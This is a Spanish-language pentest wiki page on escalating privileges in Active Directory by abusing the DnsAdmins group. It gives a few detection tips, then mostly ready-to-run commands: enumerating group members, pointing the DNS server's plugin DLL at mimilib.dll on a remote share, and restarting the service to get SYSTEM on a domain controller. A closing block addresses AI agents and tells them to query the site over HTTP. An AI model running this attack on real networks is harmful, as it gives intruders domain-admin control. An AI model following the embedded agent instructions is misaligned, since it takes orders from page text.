# PE - DNSAdmin Los usuarios que son miembros del grupo 'DnsAdmins' tienen la capacidad de abusar de una característica del protocolo de gestión de DNS de Microsoft para hacer que el servidor DNS cargue cualquier DLL especificada. El servicio que a su vez ejecuta la DLL se realiza en el contexto de SYSTEM y podría utilizarse en un Controlador de Dominio (desde donde se ejecuta normalmente el DNS) para obtener privilegios de Administrador de Dominio. Para identificarlo: * Monitoriza los procesos hijos generados bajo DNS.exe en los servidores DNS. * Audita ACL para el privilegio de escritura en el objeto del servidor DNS y la pertenencia al grupo DNSAdmins * Supervisa los registros de eventos para el ID 150 \[fail] y el ID 770 \[success]. * Lista los miembros con DNSAdmins (PowerView) ```powershell Get-NetGroupMember -Identity "DNSAdmins" ``` Una vez sabemos los miembros de este grupo, debemos comprometerlos. Con los privilegios de los miembros de DNSADmins se configura una DLL usando dnscmd.exe (requiere RSAT DNS): ``` dnscmd dcorp-dc /config /serverlevelplugindll \\IP_Maquina_Remota\dll\mimilib.dll ``` Usamos el módulo DNSServer: ``` $dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All $dnsettings.ServerLevelPluginDll ="\\172.16.50.100\dll\mimilib.dll" Set-DnsServerSetting -InputObject $dnsettings -ComputerName dcorp-dc -Verbose ``` Reiniciamos el servicio DNS ``` sc \\dcorp-dc stop dns sc \\dcorp-dc start dns ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.securiters.com/securiters-wiki/internas/ad/pe_delegations.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.